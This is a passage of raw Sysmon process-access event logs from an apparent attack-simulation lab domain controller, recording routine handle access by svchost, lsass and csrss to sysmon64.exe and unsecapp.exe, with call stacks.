10341000x800000000000000034Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.321{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000033Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.321{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000032Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.321{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000031Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.321{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000030Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.321{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000029Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.321{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000028Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.321{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000027Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.321{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000026Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.321{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000025Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.321{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000024Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.321{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000023Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.305{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000022Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.305{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000021Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.305{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000020Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.305{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000019Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.305{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000018Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.305{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000017Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.305{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000016Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.305{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000015Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.305{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000014Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.305{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000013Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.305{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000012Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.305{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000011Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.274{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F502-000000007E01}4592C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x800000000000000010Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.274{5D479F2C-14FE-5F84-0500-000000007E01}640656C:\Windows\system32\csrss.exe{5D479F2C-1676-5F84-F502-000000007E01}4592C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000009Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 